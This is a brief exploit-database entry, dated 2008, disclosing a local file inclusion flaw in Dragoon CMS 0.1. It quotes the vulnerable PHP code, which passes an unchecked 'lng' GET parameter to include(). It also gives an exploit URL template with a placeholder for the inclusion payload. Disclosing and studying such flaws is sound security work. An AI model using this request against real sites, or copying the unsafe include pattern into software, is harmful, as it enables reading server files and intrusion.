Dragoon 0.1 (lng) Local File Inclusion Vulnerability

2008-04-04T00:00:00
ID 1337DAY-ID-2816
Type zdt
Reporter w0cker
Modified 2008-04-04T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ====================================================
Dragoon 0.1 (lng) Local File Inclusion Vulnerability
====================================================



Script Name :Dragoon CMS
 
Error :
$cal['lng']=$_GET['lng'];
include('../lang/'.$cal['lng'].'.php');
 
Vul Code : http://[site]/[path]/forum/kietu/libs/calendrier.php?cal[lng]=[LFI]



#  0day.today [2018-03-09]  #